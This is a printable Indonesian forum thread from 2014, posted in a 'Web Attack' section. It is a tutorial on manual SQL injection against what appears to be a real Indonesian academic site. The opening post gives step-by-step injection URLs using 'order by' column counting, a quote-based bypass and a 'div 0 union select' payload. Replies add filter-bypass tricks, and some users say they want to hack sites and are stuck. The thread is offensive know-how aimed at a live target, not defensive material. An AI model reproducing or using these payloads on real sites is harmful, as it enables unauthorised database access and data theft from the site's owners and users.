Share SQL Injection 'order by 10000' and still not error? - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Share SQL Injection 'order by 10000' and still not error? (/thread-5638.html) |
SQL Injection 'order by 10000' and still not error? - wine trochanter - 02-26-2014 assalamualaikum okay sesuai judul [hide] jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan target:target.ac.id/bid/utama.php?mod=detail&id=77 coba kita masukkan perintah target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2 Spoiler! :
coba kita ganti perintah nya seperti ini .ac.id/bid/utama.php?mod=detail&id=77' order by 100-- - hemm gk keluar apa2, malah blank :v coba kecilin lg order by nya Spoiler! :
wew pas di kecilin muncul lagi tulisan nya Spoiler! :
berarti kita asumsikan ada 8 kolom coba kita tes dan ternyata gk keluar angka ajaib nya [spolier][/spoiler] coba kita ganti perintah nya dg ini target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- - Spoiler! :
dan tarraaa keluar angka ajaib nya selanjut nya sama seperti syntax sqli biasa nya[/hide] udah gitu aja, semoga bermanfaat RE: SQL Injection 'order by 10000' and still not error? - mywisdom - 02-27-2014 waaahhh mantap om, kapan2 ajarin sql injection ya, kebetulan ane lagi belajar juga RE: SQL Injection 'order by 10000' and still not error? - Anak-Bodoh - 04-20-2014 mantap (y) gak tau mau nulis apa , post replynya harus memenuhi 30 karakter :3 RE: SQL Injection 'order by 10000' and still not error? - arfha - 04-20-2014 wah makasih infonya pak dokter.. kebetulan mau ngehack mentok disini melulu... Ijin belajar yakk RE: SQL Injection 'order by 10000' and still not error? - ./Gula_an - 09-07-2014 coba baca dari dulu yaa :v .. Nice inpoh kaks RE: SQL Injection 'order by 10000' and still not error? - dimascyber4rt - 09-07-2014 thanks bro tutornya hehehehe.... RE: SQL Injection 'order by 10000' and still not error? - MalaikatKertas - 12-05-2014 Biasa nya kalau saya bypass aja pake ' dan +--+ RE: SQL Injection 'order by 10000' and still not error? - orang sederhana - 12-05-2014 (02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum kok ane bgini ya om @[b]wine trochanter[/b] [b] [/b] pertamanya begini om RE: SQL Injection 'order by 10000' and still not error? - wine trochanter - 12-05-2014 (12-05-2014, 08:08 AM)orang sederhana Wrote:(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum union select nya smpe 39 aja, 40 kan udah unknow gtu RE: SQL Injection 'order by 10000' and still not error? - Kresna - 12-05-2014 nice share om , cek kulkas |